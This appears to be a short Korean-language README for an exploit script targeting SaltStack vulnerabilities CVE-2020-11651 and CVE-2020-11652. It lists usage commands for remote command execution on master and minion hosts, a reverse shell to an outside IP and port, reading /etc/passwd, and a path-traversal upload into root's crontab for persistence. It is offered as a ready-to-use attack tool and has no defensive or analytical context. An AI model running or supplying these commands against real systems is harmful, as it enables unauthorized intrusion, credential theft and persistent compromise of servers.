
SaltStack CVE(CVE-2020-11651/11652)용 익스플로잇으로, 마스터/미니언에서 원격 명령 실행, 파일 읽기/업로드, 리버스 셸을 가능하게 합니다.
CVE-2020-11651 CVE-2020-11652
python exp.py --exec-choose master --exec-cmd "whoami"
python exp.py --exec-choose minions --exec-cmd "whoami"
python exp.py --shell-LHOST 8.8.8.8 --shell-LPORT 4444
python exp.py --read /etc/passwd
python exp.py --upload-src "/test/root" --upload-dest "../../../../../../../../var/spool/cron/crontabs/root"